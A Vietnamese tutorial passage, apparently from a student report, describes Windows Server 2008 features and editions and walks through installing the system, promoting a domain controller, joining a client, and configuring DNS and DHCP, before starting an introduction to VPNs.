Windows Server Backup và Disk Management đều nằm trên Server Manager.
2.2. Windows Server Core
- Server Core là một tính năng mới trong Windows Server 2008. Nó cho phép
có thể cài đặt với mục đích hỗ trợ đặc biệt và cụ thể đối với một số role.
- Tất cả các tương tác với Server Core được thông qua các dòng lệnh.
Server Core mang lại những lợi ích sau:
+ Giảm thiểu được phần mềm, vì thế việc sử dụng dung lượng ổ đĩa cũng
được giảm. Chỉ tốn khoảng 1GB khi cài đặt.
+ Bởi vì giảm thiểu được phần mềm nên việc cập nhật cũng không nhiều.
+ Giảm thiểu tối đa những hành vi xâm nhập vào hệ thống thông qua các
port được mở mặc định.
+ Dễ dàng quản lý.
- Server Core không bao gồm tất cả các tính năng có sẵn trong những phiên bản
cài đặt Server khác. Ví dụ như .NET Framework hoặc Internet Explorer.
2.3. PowerShell
PowerShell là một tập hợp lệnh. Nó kết nối những dòng lệnh shell với một ngôn
ngữ script và thêm vào đó hơn 130 công cụ dòng lệnh(được gọi là cmdlets).Hiện tại,
có thể sử dụng PowerShell trong:
Exchange Server
+ SQL Server
+ Terminal Services
+ Active DirectoryDomain Services.
+ Quản trị các dịch vụ, xử lý và registry.

20. 12
Mặc định, Windows PowerShell chưa được cài đặt. Tuy nhiên bạn có thể cài đặt nó
một cách dễ dàng bằng cách sử dụng công cụ quản trị Server Manager và chọn
Features > Add Features
2.4. Windows Deloyment Services.
Windows Deployment Services được tích hợp trong Windows Server 2008 cho
phép bạn cài đặt hệ điều hành từ xa cho các máy client mà không cần phải cài đặt
trực tiếp. WDS cho phép bạn cài đặt từ xa thông qua Image lấy từ DVD cài đặt.
Ngoài ra, WDS còn hỗ trợ tạo Image từ 1 máy tính đã cài đặt sẵn Windows và đầy
đủ các ứng dụng khác.
Windows Deployment Serviece sử dụng định dạng Windows Image (WIM). Một
cải tiến đặc biệt với WIM so với RIS là WIM có thể làm việc tốt với nhiều nền tảng
phần cứng khác nhau.
2.5. Terminal Services.
Terminal Services là một thành phần chính trên Windows Server 2009 cho phép
user có thể truy cập vào server để sử dụng những phần mềm.
Terminal Services giúp người quản trị triển khai và bảo trì hệ thống phần mềm
trong doanh nghiệp một cách hiệu quả. Người quản trị có thể cài đặt các chương
trình phần mềm lên Terminal Server mà không cần cài đặt trên hệ thống máy client,
vì thế việc cập nhật và bảo trì phần mềm trở nên dễ dàng hơn.
Terminal Services cung cấp 2 sự khác biệt cho người quản trị và người dùng cuối
Dành cho người quản trị: cho phép quản trị có thể kết nối từ xa hệ thống quản trị
bằng việc sử dụng Remote Desktop Connection hoặc Remote Desktop.
Dành cho người dùng cuối: cho phép người dùng cuối có thể chạy các chương trình
từ Terminal Services server.
2.6. Network Access Protection
Network Access Protection (NAP) là một hệ thống chính sách thi hành (Health
Policy Enforcement) được xây dựng trong các hệ điều hành Windows Server 2008.
Cơ chế thực thi của NAP:
+ Kiểm tra tình trạng an toàn của client.
+ Giới hạn truy cập đối với các máy client không an toàn.

21. 13
+ NAP sẽ cập nhật những thành phần cần thiết cho các máy client không an
toàn, cho đến khi client đủ điều kiện an toàn.Cho phép client kết nối nếu
client đã thỏa điều kiện.
+ NAP giúp bảo vệ hệ thống mạng từ các client.
+ NAP cung cấp bộ thư viên API (Application Programming Interface), cho
phép các nhà quản trị lập trình nhằm tăng tính bảo mật cho mình
2.7. Read-Only Domain Controllers
Read-Only Domain Controller (RODC) là một kiểu Domain Controller mới trên
Windows Server 2008.Với RODC, doanh nghiệp có thể dễ dàng triển khai các
Domain Controller ở những nơi mà sự bảo mật không được đảm bảo về bảo mật.
RODC là một phần dữ liệu của Active Directory Domain Services.
Vì RODC là một phần dữ liệu của ADDS nên nó lưu trữ mọi đối tượng, thuộc tính
và các chính sách giống như domain controller, tuy nhiên mật khẩu thì bị ngoại trừ.
2.8. Công nghệ Failover Clustering.
Clustering là công nghệ cho phép sử dụng hai hay nhiều server kết hợp với nhau để
tạo thành một cụm server để tăng cường tính ổn định trong vận hành.Nếu server này
ngưng hoạt động thì server khác trong cụm sẽ đảm nhận nhiệm vụ mà server ngưng
hoạt động đó đang thực hiện nhằm mục đích hoạt động của hệ thống vẫn bình
thường. Quá trình chuyên giao gọi là fail-over.
Những phiên bản sau hỗ trợ:
 Windows Server 2008 Enterprise
 Windows Server 2008 Datacenter
 Windows Server 2008 Itanium
2.9. Windows Firewall with Advance Security
Windows Firewall with Advance Security cho phép người quản trị có thể cấu hình
đa dạng và nâng cao để tăng cường tính bảo mật cho hệ thống.
Windows Firewall with Advance Security có những điểm mới:
Kiểm soát chặt chẽ các kết nối vào và ra trên hệ thống (inbound và outbound)
IPsec được thay thế bằng khái niệm Connection Security Rule, giúp bạn có thể kiểm
soát và quản lý các chính sách, đồng thời giám sát trên firewall. Kết hợp với Active
Directory.
Hỗ trợ đầy đủ IPv6.

22. 14
3. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008
3.1. Công nghệ ảo hóa Hyper-V
Hyper-V là công nghệ ảo hóa server thế hệ mới của Microsoft, sự thay đổi lớn nhất
mà Microsoft mang lại so với phiên bản Windows Server 2003. Hyper-V hoạt động
trên nền hệ điều hành 64-bit. Với Hyper-V, người sử dụng có thể sở hữu một nền
tảng ảo hóa linh hoạt, bảo mật, tối đa hiệu suất và tiết kiệm chi phí:
Hyper-V có thể thích nghi với doanh nghiệp lớn với hàng nghìn máy tính hoặc các
doanh nghiệp nhỏ hay văn phòng chi nhánh. Hyper-V hỗ trợ bộ nhớ ảo lên đến
64GB, đa bộ vi xử lý.
Khả năng bảo mật giống như các server vật lý. Kết hợp các cộng cụ bảo mật
Windows Firewall, Network Access Protection…do đó tính bảo mật tốt như môi
trường thật.
Hyper-V giúp khai thác tối đa hiệu suất sử dụng phần cứng server. Bằng việc hợp
nhất server, cho phép một server vật lý có thể đóng nhiều vai trò của nhiều server.
Từ đó, tiết kiệm được chi phí từ các khoảng mua server, điện, không gian và bảo trì.
Hyper-V chỉ có thể hỗ trợ đến 32 bộ vi xử lý.
3.2. Processor Compatibility Mode
Cho phép di trú các máy ảo sang một máy chủ vật lý khác với một phiên bản CPU
khác (nhưng không phải là CPU của nhà sản xuất khác). Trước đây, để chuyển một
máy ảo Hyper-V sang một phần cứng khác, các CPU phải giống nhau, điều đó yêu
cầu người dùng thường phải mua lại phần cứng mới.
3.3. File Classification Infrastructure
FCI là một tính năng built-in cho phép các chuyên gia CNTT phân loại và quản lý
dữ liệu trong các máy chủ file. Dữ liệu có thể được phân loại với tác động doanh
nghiệp mức thấp, cao hoặc trung bình, sau đó người dùng có thể backup các dữ liệu
quan trọng nhất dễ dàng hơn và hiệu quả hơn.
3.4. Quản lý trong ỗ đĩa và file:
- Cung cấp khả năng thay đổi kich thước phân vùng.
- Shadow Copy hỗ trợ ổ đĩa quang, ổ đĩa mạng.
- Distributed File System được cải tiến.
- Cải tiến Failover Clustering.

23. 15
- Internet Storage Naming Server cho phép đăng ký, hủy đăng ký tập trung và
truy xuất tới các ổ đĩa cứng iSCS.
3.5. Cải tiến giao thức và mã hóa
- Hỗ trợ mã hóa 128 và 256 bit cho giao thức chứng thực Keberos.
- Hàm API mã hóa mới hỗ trợ mã hóa vòng elip và cải tiến quản lý chứng chỉ.
- Giao thức VPN mới Secure Socket Tunneling Protocol.
- AuthIP được sử dụng trong mạng VPN Ipsec.
- Giao thức Server Message Block 2.0 cung cấp các cải tiến trong truyền thông.
3.6. Một số tính năng khác
- Windows Deployment Services thay thế cho Automated Deployment Services
và Remote Installation Services.
- IIS 7 thay thế IIS 6, tăng cường khả năng bảo mật, cải tiến công cụ chuẩn
đoán, hỗ trợ quản lý.
- Có thành phần "Desktop Experience" cung cấp khả năng cải tiến giao diện.
4. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008
Windows Server 2008 mang đến lợi ích trong bốn lĩnh vực:Web, Ảo hóa, Bảo mật,
Nền tảng vững chắc cho các hoạt động của tổ chức
4.1. Web
Windows Server 2008 cung cấp một nền tảng đồng nhất để triển khai dịch vụ Web
nhờ tích hợp IIS7.0,ASP.NET,Windows Communication Foundation và Microsoft
Windows SharePoint Services.
Lợi ích của IIS 7.0:
- Tính năng phân tích
- Quản trị hiệu quả.
- Nâng cao tính bảo mật.
- Giảm chi phí hỗ trợ.
- Giao diện thân thiện và tiện dụng
- Hỗ trợ việc sao chép giữa các site.
- Copy dễ dàng các thiết lập của trang web giữa các máy chủ web khác nhau mà
không cần phải thiết lập gì thêm.
- Chính sách phân quyền quản trị các ứng dụng và các site rõ ràng

24. 16
4.2. Ảo hóa :
Phiên bản 64 bit của Windows Server 2008 được tích hợp sẵn công nghệ ảo hóa
hypervisor :
- Cho phép máy ảo tương tác trực tiếp với phần cứng máy chủ hiệu quả hơn.
- Có khả năng ảo hóa nhiều hệ điều hành khác nhau trên cùng 1 phần cứng máy
chủ sẽ làm giảm chi phí, tăng hiệu suất sử dụng phần cứng, tối ưu hóa hạ tầng,
nâng cao tính sẵn sàng của máy chủ.
- Tiết kiệm chi phí mua sắm bản quyền phần mềm.
- Tich hợp và tập trung các ứng dụng phục vụ cho việc truy cập từ xa một cách
dễ dàng bằng cách sử dụng Terminal Services.
4.3. Bảo mật:
Các tính năng an ninh bao gồm: Network Access Protection, Read-Only Domain
Controller, BitLocker, Windows Firewall… cung cấp các mức bảo vệ chưa từng có
cho hệ thống mạng, dữ liệu và công việc của tổ chức.
4.4. Network Access Protection (NAP):
- NAP dùng để thiết lập chính sách mạng đối với các máy trạm khi máy trạm đó
muốn kết nối váo hệ thống mạng của tổ chức. Yêu cầu an ninh đối với máy
trạm được kết nối với hệ thống mạng:
- Đã cài đặt phầm mềm diệt virus.
- Đã cập nhật phiên bản mới.
- Đã cài đặt các bản và lỗi hệ thống hoặc đã cài đặt phần mềm firewall.
4.5. Read-Only Domain Controller (RODC):
Là một kiểu Domain Controller (DC).
- RODC chứa một bản sao các dữ liệu "chỉ đọc" của dữ liệu Active Directory
(AD).
- User không thẻ ghi trực tiếp vào RODC.
- RODC không chứa thông tin về mật khẩu trong AD, mà chỉ caching các users
được phép sử dụng ở đó.
 RODC thích hợp cho việc triển khai ở các chi nhánh, nơi có điều kiện bảo mật
kém cũng như trình độ của nhân viên IT còn hạn chế.
4.6. BitLocker:
- Bảo vệ an toàn cho máy chủ, máy trạm, máy tính di động.

25. 17
- Mã hóa nội dung của ổ đĩa nhằm ngăn cản
- Nâng cao khả năng bảo vệ dữ liệu: kết hợp chức năng mã hóa tập tin hệ thống
và kiểm tra tinh toàn vẹn của các thành phần khi boot.
- Toàn bộ tập tin hệ thống được mã hóa, gồm cả file swap và file hibernation.
4.7. Windows Firewall:
- Ngăn chặn các lưu lượng mạng theo cấu hình và các ứng dụng dạng chạy để
bảo vệ mạng khỏi các chương trình và người dùng nguy hiểm.
- Hỗ trợ ngăn chặn các thông tin vào và ra.
- Sử dụng MMC snap-in ( Windows Firewall with Adbanced Security) để đơn
giản hóa việc cấu hình, quản trị.
5. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008
5.1. Windows Server 2008:
Ứng dụng cho các trung tâm data lớn, ứng dụng nghiệp vụ riêng,... khả năng mở
rộng cao cho tới 64 bộ xử lý.
5.2. Windows Server 2008 Standard Edition
Windows Server 2008 Standard là một trong những phiên bản ít tốn kém nhất của
các phiên bản khác nhau có sẵn. Windows Server 2008 Stardard hỗ trợ tới 4GB
RAM và 4 bộ vi xử lý.
Chủ yếu nhắm mục tiêu và các doanh nghiệp vừa và nhỏ. Chỉ có thể nâng cấp lên
Windows Server 2008 Standard từ Windows 2000 Server và Windows Server 2003
Standard Edition.
5.3. Windows Server 2008 Enterprise Edition
Windows Server 2008 Enterprise Edition cung cấp chức năng lớn hơn và có khả
năng mở rộng hơn so với bản tiêu chuẩn. Cũng như phiên bản Standard Edition thì
phiên bản Enterprise cũng có cả hai phiên bản 32-bit và 64-bit. Hỗ trợ 8 bộ xử lý và
lên tới 64GB bộ nhớ RAM trên hệ thống 32-bit và 2TB RAM trên hệ thống 64-bit.
Các tính năng khác của ấn bản Doanh nghiệp bao gồm hỗ trợ Clustering đến 8 nút
và Active Directory Federated Services (AD FS).
Các phiên bản Windows Server 2000, Windows 2000 Advanced Server, Windows
Server 2003 Standard Edition và Windows Server 2003 Enterprise Edition đều có
thể được nâng cấp lên Windows Server 2008 Enterprise Edition.

26. 18
5.4. Windows Server 2008 Datacenter Edition
Phiên bản Datacenter đại diện cuối cùng của loạt sản phẩm máy chủ Windows 2008
và mục tiêu là nhiệm vụ quan trọng đòi hỏi các doanh nghiệp ổn định và mức độ
thời gian hoạt động cao. Windows Server 2008 phiên bản Datacenter là liên hệ chặt
chẽ với các phần cứng cơ bản thông qua việc thực hiện tùy chỉnh Hardware
Abstraction Layer (HAL).
Windows server 2008 Datacenter cũng hỗ trợ hai phiên bản 32 bit và 64 bit. Nó hỗ
trợ 64GB bộ nhớ RAM trên nền 32 bit và lên tới 2TB RAM trên nền 64 bít. Ngoài
ra phiên bản này còn hỗ trợ tối thiểu là 8 bộ vi xử lý và tối đa là 64.
Để nâng cấp lên phiên bản này thì phải là các phiên bản Datacenter 2000 và 2003.
5.5. Windows Web Server 2008
Windows Web Server 2008 là một phiên bản của Windows Server 2008 được thiết
kế chủ yếu cho mục đích cung cấp các dịch vụ web. Nó bao gồm Internet
Information Services (IIS) 7,0 cùng với các dịch vụ liên quan như Simple Mail
Transfer Protocol (SMTP) và Telnet. Nó cũng có các phiên bản 32-bit và 64-bit,
phiên bản và hỗ trợ lên đến 4 bộ vi xử lý. RAM được giới hạn 4GB và 32GB trên
32-bit và 64-bit hệ thống tương ứng.
Windows Web Server 2008 thiếu nhiều tính năng hiện diện trong các phiên bản
khác như phân nhóm,mã hóa ổ đĩa BitLocker, Multi I/O,Windows Internet Naming
Service (WINS),Removable Storage Management và SAN Management.

27. 19
Chương 4
CÀI ĐẶT WINDOWS SERVER 2008
1. YÊU CẦU PHẦN CỨNG
Phần cứng Yêu cầu tối thiểu Đề nghị
Bộ vi xử lý 1 Ghz (x86), 1,4 Ghz (x64) 2Ghz hoặc lớn hơn
RAM 512MB RAM 2GB
Dung lượng trống 15GB 40GB
Windows Server 2008 hỗ trợ cả 2 cấu trúc vi xử lý 32-bit và 64-bit. Tuy nhiên,
phiên bản mới nhất là Windows Server 2008 R2, Windows Midmarket Server và
Windows Small Business với những tính năng đa dịch vụ, các phiên bản này chỉ hỗ
trợ cấu trúc vi xử lý 64-bit.
RAM hỗ trợ tối đa cho hệ thống 32-bit là 4GB khi chạy phiên bản Standard
Edition và 64GB khi chạy phiên bản Enterprise và Datacenter. Nếu chạy hệ thống
64-bit, bộ nhớ RAM có thể hỗ trợ lên dến 32GB và 2TB RAM cho phiên bản
Enterprise và Datacenter. Thêm vào đó, Windows Server 2008 hỗ trợ hệ thống
Itanium, tuy nhiên chip xử lí Intel Itanium 2 nhân là cần thiết.
2. CÁC CÁCH CÀI ĐẶT
Có 6 cách cài đặt Windows Server 2008
 Tự cài đặt các nâng cấp
 Cài đặt từ kịch bản
 Sử dụng Sconfig
 Visual Core Configurator 2008
 Cài đặt bằng cách sử dụng Core Configurator 2.0
 Cài đặt trực tiếp từ đĩa CD Windows Server 2008
3. NÂNG CẤP LÊN WINDOWS SERVER 2008

28. 20
Những phiên bản trước
Nâng cấp lên
Windows Server
2008
Microsoft Windows Server 2003 R2 Standard,
Enterprise hoặc DatacenterEdition
Hỗ trợ đầy đủ
Microsoft Windows Server 2003 Service Pack
1(SP1) Standard, Enterprise hoặc Datacenter
Edition
Hỗ trợ đầy đủ
Microsoft Windows Server 2003 Service Pack 2
(SP2) Standard, Enterprise hoặc Datacenter
Edition
Hỗ trợ đầy đủ
Windows NT 4.0 Không hỗ trợ
Windows 2000 Server Không hỗ trợ
Windows XP Không hỗ trợ
Windows Vista Không hỗ trợ
Windows 7 Không hỗ trợ
Để nâng cấp lên phiên bản Windows Server 2008, cần phải chạy các hệ điều hành ở
cấp độ server. Không thể nâng cấp các phiên bản Windows dành cho người dùng
như Windows XP hoặc Windows Vista lên Windows Server 2008. Để nâng cấp
lên Windows Server 2008, hệ thống của bạn phải chạy Windows Server 2003.
Việc nâng cấp từ Windows NT 4.0 và Windows 2000 Server không được hỗ trợ.
Việc nâng cấp từ những phiên bản Windows Server 2003 lên phiên bản Windows
Server 2008 Server Core không được hỗ trợ. Việc nâng cấp chỉ thực hiện được ở
những phiên bản giống nhau. Khi nâng cấp lên phiên bản Windows Server 2008,
mọi cấu hình thiết lập, file và các chương trình đều được giữ lại
4. CÀI ĐẶT WINDOWS SERVER 2008
Đặt đĩa CD vào ổ đĩa, khởi động lại máy tính và bắt đầu tiến hành quá trình cài đặt.
Language to instalk : ngôn ngữ bạn muốn hiển thị.

29. 21
Time and currency format : định dạng thời gian và tiền tệ.
Keyboard or input method : định dạng bàn phím và phương thức nhập chữ.Sau khi
lựa chọn, click Next để tiếp tục cài đặt
Click Install now để bắt đầu cài đặt.

30. 22
Lựa chọn phiên bản Windows Server thích hợp, ở đây chúng ta chọn phiên bản
Windows Server Standard without Hyper-V. Click Next để tiếp tục.
Tại bảng MICROSOFT PRE-RELEASE SOFTWARE LICENSE TERMS là
những điều khoản sử dụng sản phẩm của Microsoft. Đánh dấu chọn vào I
accept the license terms để chấp nhận những điều khoản đó và click Next để
tiếp tục.

31. 23
Chọn Custom (advaneced) để tiến hành cài đặt tùy chọn.
Tiếp theo là chọn ổ đĩa để cài dặt Windows. Tiếp tục click Next sau khi đã chọn ổ
đĩa cài đặt.

32. 24
Đợi cho đến khi hoàn tất cài đặt Windows Server 2008
Sau khi hệ thống hoàn tất cái đặt sẽ tự động đăng nhập vời tài khoản Administrator,
tuy nhiên mật khẩu đang ở trạng thái trống (blank) vì thế cần phải thiết lập mật khẩu
ở lần đăng nhập đầu tiên.
Click OK để tiến hành thay đổi mật khẩu.Sau đó đăng nhập vào bằng mật khẩu vừa
thay đổi.
Đến đây quá trình cài đặt kết thúc.

33. 25
Chương 5
DỰNG DOMAIN CONTROLLER
Giống như Windows Server 2003 sẽ vẫn cần chạy dcpromo từ nhắc lệnh Run, tuy
nhiên cần phải cài đặt Active Directory Domain Controller role, đầu tiên bạn
cài đặt role, sau đó chạy dcpromo.Vào Server ManagerRolesAdd Roles
Xuất hiện trang Before You Begin, nhấn Next để tiếp tục.

34. 26
Chọn Active Directory Domain ServicesAdd Required Features để cài
đặt thêm các tính năng này với Active Directory Server Role.
Sau khi chọn Active Directory DC Server Role, bạn sẽ thấy các thông tin về Server
Role.
Kích Install để cài đặt các file yêu cầu nhằm chạy dcpromo
Cài đặt được thực hiện thành công. Kích Close.

35. 27
Trong bài này, chúng ta sẽ sử dụng 2 máy.
PC1: Là máy sử dụng Windows Server 2008.
PC2: Là máy sử dụng Client sử dụng Windows 7.
Quá trình cài đặt sẽ trải qua 2 bước chính:
Bước 1: Chỉnh Preferred DNS
- Ở bước này chúng ta sẽ chỉnh Preferred DNS về chính máy tính của chúng ta, ở
đây là ip 192.168.1.1.
Trong trường hợp giả sử chúng ta quên làm bước này, thì quá trình nâng cấp vẫn
diễn ra bình thường, và Windows sẽ tự chỉnh Preferred DNS về địa chỉ 192.168.1.1
Nhưng tốt nhất các bạn nên làm bước chỉnh này
Bước 2: Nâng cấp lên Domain Controller
- Bạn vào Start-> Chọn Run, gõ dcpromo và Enter, sau đó lần lượt làm theo các
bước sau:

36. 28
Tiếp nào.
Thao tác này sẽ khởi chạy Welcome to the Active Directory Domain Service
Installation Wizard. Kích Next.
Sau đó tiếp tục nhấn Next.
Trong trang Choose a Deployment Configuration Create a new domain
in a new forest..
Trong trang Name the Forest Root Domain, nhập vào tên của miền trong hộp
nhập liệu FQDN of the forest room domain.Nhấn Next để tiếp tục.

37. 29
Nhấn Next để tiếp tục.
Trong trang Set Forest Functional Level, chọn Windows Server 2008. Nhấn
Next để tiếp tục.
Trong trang Additional Domain Controller Options, Chọn DNS server và
kích Next.

38. 30
Một hộp thoại sẽ xuất hiện nói răng không thể tạo đại biểu cho máy chủ DNS này vì
không thể tìm thấy vùng xác thực hoặc nó không chạy Windows DNS server. Lý do
cho điều này là vì đây là DC đầu tiên trên mạng. Nhấn Next để tiếp tục.
Để lại thư mục Database, Log Files và SYSVOL ,kích Next.

39. 31
Trong Directory Service Restore Mode Administrator Password, nhập một
mật khẩu mạnh vào các hộp nhập liệu Password và Confirm password.
Xác nhận các thông tin trên trang Summary và kích Next.

40. 32
Active Directory sẽ cài đặt. Đặt một dấu kiểm vào hộp chọn Reboot on
completion để máy tính sẽ tự động khởi động lại khi cài đặt DC được hoàn tất.

41. 33
Chương 6 JOIN DOMAIN
Chỉnh ip của máy Windows XP sao cho cùng địa chỉ của lớp mà ta đã gán ở máy
Server và DNS trỏ về địa chỉ ip của máy Server.
Vào Start click phải computer chọn properties. Chọn Tab Computer Name
Click vào Change để mở hộp thoại Computer Name Change. Sau đó click chọn
Domain và nhập tên Domain vào khung  Oke

42. 34
Nhập user Administrator và pass.
Click OK và máy tính sẽ khởi động lại. Sau khi khởi động là máy đã được join
thành công. Vào server để tạo user và sau đó đăng nhập vào máy win xp để kiểm
tra.

43. 35
Chương 7
TRIỂN KHAI CÁC DỊCH VỤ MẠNG
1. DỊCH VỤ DNS
1.1. Giới thiệu về DNS
DNS (Domain Name System) Server là máy chủ được dùng để phân giải domain
thành địa chỉ IP và ngược lại. Về cách thức hoạt động, DNS Server lưu trữ một cơ
sở dữ liệu bao gồm các bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi máy
client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong cơ sở dữ liệu
và gửi kết quả tương ứng về máy client.
1.2. Cài đặt DNS
Vào Server Manager  Roles Add Roles.Tại bảng Select Server Roles, chọn
DNS Server
Sau đó nhấn Next để tiếp tục
Chọn Instal. Tại bảng Confirm Installation Selections xác nhận việc cài đặt.

44. 36
Chọn Close để hoàn tất cài đặt.
1.3. Cấu hình DNS
Đối với DNS Server,thông thường nên xây dựng đồng thời hai hệ thống là DNS
Server chính (Primary) và DNS Server dự phòng (Secondary) dùng chung một cơ
sở dữ liệu. Với phương pháp này,sẽ hạn chế khả năng dịch vụ DNS bị ngưng khi có
sự cố xảy ra trên hệ thống.
Vào Start Administrative Tools DNS.
Nhấp chuột phải vào Forward Lookup Zones và chọn New Zone.

45. 37
Tại bản Welcome to the New Zone Wizard ,chọn Next
Tại bảng Zone Type chọn Primary zone để cấu hình DNS Server chính.
Chọn Next. Tại bảng Zone Name gõ tên domain vào, chọn Next

46. 38
Tại bảng New Zone Wizard, để mặc định. Chọn Next.
Chọn Next. Tại bảng Completing the New Zone Wizard xem lại thông tin.
Sau đó chọn Finish để hoàn tất.
Nhấp chuột phải vào ReverseLookup Zones và chọn New Zone.
Tại bảng Welcome to the New Zone Wizard chọn Next.

47. 39
Tại bảng Zone Type chọn Primary zone để cấu hình chức năng reverse cho DNS
Server chính.
Chọn Next.Tại bảng Reverse Lookup Zone Name chọn kiểu IP cần phân giải. Ở đây
chọn IPv4.
Chọn Next. Điền Network ID và chọn Next.
Tại bảng Zone File để mặc định. Chọn Next.
Tại bảng Dynamic Update chọn Allow both nonsecure dynamic updates.

48. 40
Chọn Next và xem lại thông tin thiết lập, và sau đó chọn Finish để kết thúc.
Bổ sung các bản ghi DNS vào DNS Server
Start Administrative Tools DNS. Nhấp chuột phải vào zone và chọn New - Gõ
tên host vào mục Name, gõ địa chỉ IP vào mục IP address. Nếu muốn tạo ra một
bản ghi DNS phân giải ngược tương ứng thì đánh dấu chọn Create associated
pointer (PTR) record.
Sau đó chọn Add Host.Xuất hiện thông báo thành công.

49. 41
Kiểm tra
2. GIỚI THIỆU DỊCH VỤ DHCP
- Dịch vụ DHCP cho phép chúng ta cấp động các thông số cấu hình mạng cho
các máy trạm.(client).
- Cơ chế sử dụng các thông số mạng được cấp phát động có ưu điểm hơn so với
cơ chế khai báo tĩnh các thông số mạng như:
- Khắc phục được tình trạng đụng địa chỉ IP và giảm chi phí quản trị cho hệ
thống mạng.Giúp cho các nhà cung cấp dịch vụ (ISP) tiết kiệm được số lượng
địa chỉ IP thật (Public IP).Phù hợp cho các máy tính thường xuyên di chuyển
qua lại giữa các mạng.Kết hợp với hệ thống mạng không dây (Wireless) cung
cấp các điểm Hotspot như: nhà ga, sân bay, trường học…
2.1. Hoạt động của giao thức
Giao thức DHCP làm việc theo mô hình client/server.Khi máy client khởi động,
máy sẽ gửi broadcast gói tin DHCPDISCOVER, yêu cầu một server phục vụ mình.
Gói tin này cũng chứa địa chỉ MAC của máy client.Các máy Server trên mạng khi
nhận được gói tin yêu cầu đó, nếu còn khả năng cung cấp địa chỉ IP, đều gửi lại cho
máy Client gói tin DHCPOFFER, đề nghị cho thuê một địa chỉ IP trong một khoản
thời gian nhất định, kèm theo là một subnet mask và địa chỉ của Server.
2.2. Cài đặt DHCP trên windows server 2008
Vào Server Manger  Roles Add Roles.

50. 42
Nhấn Nexttrong mục Roles chọn “DHCP Server”. Nhấn Next.
Trong bảng này giới thiệu về DHCP và các điểm cần lưu ý Things to Note. Tiếp
tục nhấn Next.
Chọn card mạng sử dụng dịch vụ này ở đây chúng ta chỉ có một card mạng nên tiếp
tục nhấn Next nhấn Next.

51. 43
Trong mục “Parent Domain” điền tên domain và điền IP DNS server ở mục
“Preferred DNS…” và nhấn Validate để kiểm tra và xác nhận tồn tại và tiếp tục
nhấn Next.
Tiếp tục nhấn next
Tiếp tục nhấn Next.

52. 44
Tiếp tục bấm Next. Trong Bảng Configure DHCPv6 Stateless Mode ta chọn Disable
DHCPv6 stateless mode for this server và bấm Next
Chọn user có quyền AuthorNext
Xác nhận lại thông tin trước khi cài đặt dịch vụ DHCP. Bấm Install để cài đặt
- Cài đặt Role hoàn tất, và nhấn Close

53. 45
2.3. Cấu hình DHCP
2.3.1. Tạo Scop
Vào Administrative ToolsDHCP.
Nhấn chuột phải vào IPv4 và New Scope.
Hộp thoại New Scope hiện ra và Next.
Hộp thoại Scope Name vàĐiền tên của scope vào mục Name và nhấn Next
Hộp thoại IP Address Range,điền thông số range IP cấp phát và subnet mask
Next.

54. 46
Hộp thoại Lease Duration: thời gian thuê địa chỉ IP mặc định là 8 ngày
Hộp thoại Configuration DHCP Options yêu cầu chúng ta cấu hình thông số dịch
vụ của scope ngay bây giờ hoặc để sau. Ở đây ta chọn No, I will configure these
option later và nhấn Next.
Bấm Fisnish để kết thúc

55. 47
2.3.2. 3.2 Thay đổi options của Scope
- Xổ scope cần thao tác và chuột phải scope optionsConfigure Options.
- Hộp thoại Scope Options hiện ra, ở trường Available Options là những thuộc
tính sẵn sàng màchúng ta có thể thay đổi với những thuộc tính đã stick là
những thuộc tính đã được cấu hìnhtrước đó.
- Chúng ta sẽ thử cấu hình default gateway lại cho scope này, chọn Router.
Router Options hiện ta cho chúng ta thêm xóa và edit với những thuộc tính
khác cũng vậy
Kiểm tra

56. 48
Chương 8
TRIỂN KHAI VPN
1. Tìm hiểu VPN
Giải pháp VPN (Virtual Private Network) được thiết kế cho những tổ chức có xu
hướng tăng cường thông tin từ xa vì địa bàn hoạt động rộng (trên toàn quốc hay
toàn cầu). Tài nguyên ở trung tâm có thể kết nối đến từ nhiều nguồn nên tiết kiệm
được được chi phí và thời gian
Một mạng VPN điển hình bao gồm mạng LAN chính tại trụ sở (Văn phòng chính),
các mạng LAN khác tại những văn phòng từ xa, các điểm kết nối (như 'Văn phòng'
tại gia) hoặc người sử dụng (Nhân viên di động) truy cập đến từ bên ngoài.
1.1. Khái niệm.
Mạng riêng ảo hay VPN (Virtual Private Network) là một mạng dành riêng để kết
nối các máy tính lại với nhau thông qua mạng Internet công cộng. Những máy tính
tham gia mạng riêng ảo sẽ "nhìn thấy nhau" như trong một mạng nội bộ - LAN
(Local Area Network).
Internet là một môi trường công cộng, việc chia sẻ dữ liệu có tính riêng tư thông
qua Internet là cực kỳ nguy hiểm vì những dữ liệu đó có thể dễ dàng bị rò rỉ, bị ăn
cắp... Mạng riêng ảo là giao thức trợ giúp việc kết nối các máy tính lại với nhau
thông qua một kênh truyền dẫn dữ liệu (tunel) riêng đã được mã hóa.
Mạng riêng ảo giúp bảo vệ dữ liệu trong khi chúng được truyền trên Internet vì vậy
mạng riêng ảo thường được ứng dụng trong các trường hợp sau:
Làm việc từ xa: Truy cập từ xa thông qua Internet vào mạng của công ty để chia sẻ
dữ liệu cũng như thực thi các ứng dụng nội bộ.

57. 49
Kết nối nhiều mạng với nhau (Site-to-Site): Nếu công ty có nhiều văn phòng, việc
kết nối các mạng lại với nhau thành một mạng thống nhất sẽ đem lại hiệu quả ấn
tượng trong việc quản lý & chia sẻ thông tin.
Tạo phiên làm việc an toàn: Mạng riêng ảo là giải pháp tốt & với chi phí thấp cho
một số công việc đòi hỏi tính bảo mật cao như quản trị máy chủ, website, cơ sở dữ
liệu...
Nếu thường xuyên làm việc trên Internet & thông tin là tài sản vô giá, bạn nên ứng
dụng mạng riêng ảo vào công việc của mình.
1.2. Các loại VPN.
Có hai loại phổ biến hiện nay là VPN truy cập từ xa (Remote-Access ) và VPN
điểm-nối-điểm (site-to-site)
VPN truy cập từ xa còn được gọi là mạng Dial-up riêng ảo (VPDN), là một kết nối
người dùng-đến-LAN, thường là nhu cầu của một tổ chức có nhiều nhân viên cần
liên hệ với mạng riêng của mình từ rất nhiều địa điểm ở xa. Ví dụ như công ty
muốn thiết lập một VPN lớn phải cần đến một nhà cung cấp dịch vụ doanh nghiệp
(ESP). ESP này tạo ra một máy chủ truy cập mạng (NAS) và cung cấp cho những
người sử dụng từ xa một phần mềm máy khách cho máy tính của họ. Sau đó, người
